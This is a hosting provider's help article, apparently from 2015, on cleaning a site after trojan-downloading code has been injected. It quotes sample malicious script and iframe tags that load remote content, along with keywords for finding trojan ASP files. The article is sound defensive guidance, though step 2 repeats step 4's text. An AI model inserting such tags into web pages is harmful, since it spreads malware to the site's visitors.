首页 | 域名注册 | 虚拟主机 | 云企业邮箱 | 云服务器 | 建站服务 | 服务器租用托管 | 企业短信 | 企业服务
广东时代互联科技有时代互联代理客户服务中心 全国 统一销售热线:4000- 138-000 全国统一售后热线:4000-128-000IDC售后电话:0756- 3810536欢迎您来到时代互联客户服务中心!
客服首页
帮助中心
下载中心
时代优势
优质服务
域名,主机,邮箱,服务器轻松转入
中文域名全线优惠,0元获.cn域名
美国主机八折大促
热点问题
· 网站被挂马后的处理
· 云服务器如何重设
· 服务器被入侵后的一
· 服务器被入侵后的一
· 怎样删除恶意创建的
推荐问题
· 服务器被入侵后的一
· 云服务器如何重设
· 网站被挂马后的处理
· 怎样删除恶意创建的
· 服务器被入侵后的一
主页 > 帮助中心 > 服务器常见问题 > 服务器安全 > 网站被挂马后的处理方法
网站被挂马后的处理方法
作者:   文章来源:   点击数:   更新时间:2015-09-16

确认被卦的代码 → 替换被卦的文件 → 找出木马 → 关闭上传目录的执行权限 → 通知用户修改无组件上传代码漏洞
1.  确认被挂的代码
      确 认被挂代码的方式非常简单,这些代码都有共同的HTML标记:<script src=……></script>或者<iframe src=……></iframe>。一般向网页文件加入下载木马的代码都在文件的末尾,语句都是直接调用远程代码文件下载病毒,例如这 俩HTML标记里”src“路径都带有”http://“,极少部分挂马者会将下载木马的代码文件直接上传到服务器上。我们略作识别就可以知道哪些文件被 挂代码,如:
(1)文件中包含<scriptsrc=http://%61%76%65%32%2E%63%6E></script>,这种看上去莫名其妙代码肯定是被挂在上去的。
(2) 文件中包含<iframesrc=http://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe>,这类代码有时候可能是用户自己加入的,比如进行pv统计等其他流量统计代码,判断是先新建一个 空白htm文件,比如test.htm,将代码拷贝至文件中,通过本地计算机域名访问(请勿直接在服务器上访问),杀毒软件出现病毒提示则已经确定是被卦 代码,判断不带”http://“路径的标记是否被挂马的方式也是如此,方法简单有效。
(3)同一段代码在同一个文件里面反复出现,如图:

 

(4)所有代码的文件属性中修改时间都完全接近,如图:

 

2.替换被卦的文件
     先 从服务器上确认用于存放上传文件的目录,一般这类目录里面全部都是图片,或者有一部分被上传上来的木马程序,在iis里面展开站点,右键点击目录,选择属 性,打开该文件夹的属性窗口。在”执行许可”窗口里,将脚本执行权限修改成”无”,这样,该目录就不具备脚本执行权限了,里面的所有脚本运行时提示403 禁止执行的错误。依次查找该站点的其他上传目录,也可以将所有存放图片的目录都作此修改,预防万一。

3.找出木马
      目 前的木马绝大部分都是asp文件,分为加密和未加密文件,由于木马文件为了能够给控制者提权,是需要读取注册表某些键值,我们只需要在未加密木马文件中查 找包含”HKLM\SYSTEM\“关键字的文件绝对都是木马,用户程序是不会去读服务器注册表的。如果文件已经加密,则加密文件中基本上都含 有”VBScript.Encode“字符,所以只需要搜索以上两个关键字的文件,能够所处绝大部分木马文件来,搜索方法如下图:

 

4.关闭上传目录的执行权限
      一 般无组件上传都会特定上传目录,用于存放上传文件。木马需要被上传上来首先就要伪装成图片上传到指定的目录里面,如果我们将该目录在iis里的脚本执行权 限关闭,即设置成”无”脚本执行权限,那么上传的木马即使在服务器上也无法运行,就不会对用户站点或者服务器造成危害,方法如下图:

 


      先从 服务器上确认用于存放上传文件的目录,一般这类目录里面全部都是图片,或者有一部分被上传上来的木马程序,在iis里面展开站点,右键点击目录,选择属 性,打开该文件夹的属性窗口。在”执行许可”窗口里,将脚本执行权限修改成”无”,这样,该目录就不具备脚本执行权限了,里面的所有脚本运行时提示403 禁止执行的错误。依次查找该站点的其他上传目录,也可以将所有存放图片的目录都作此修改,预防万一。

5 . 通知用户修改无组件上传代码漏洞
     用户站点上存在木马,绝对是由于用户的上传程序存在检测漏洞,请及时更新上传代码,以免遭受不必要的损失。

本文由时代互联提供,更多服务器信息请访问:http://www.now.cn

 



分享到:
  • 上一篇:服务器被入侵后的一些处理办法

  • 下一篇:云服务器如何重设mysql密码(linux系统)?
  • mimeograph 打印本文 closed 关闭窗口

    关于我们 | 联系我们 | 交费确认 | 友情链接 | 诚征英才
    中华人民共和国
    增值电信业务经营许可证
    粤B2-20042046
    Copyright © 2000-2013 Todaynic.com,Inc. All rights reserved
    时代互联 2000-2013 版权所有 严禁复制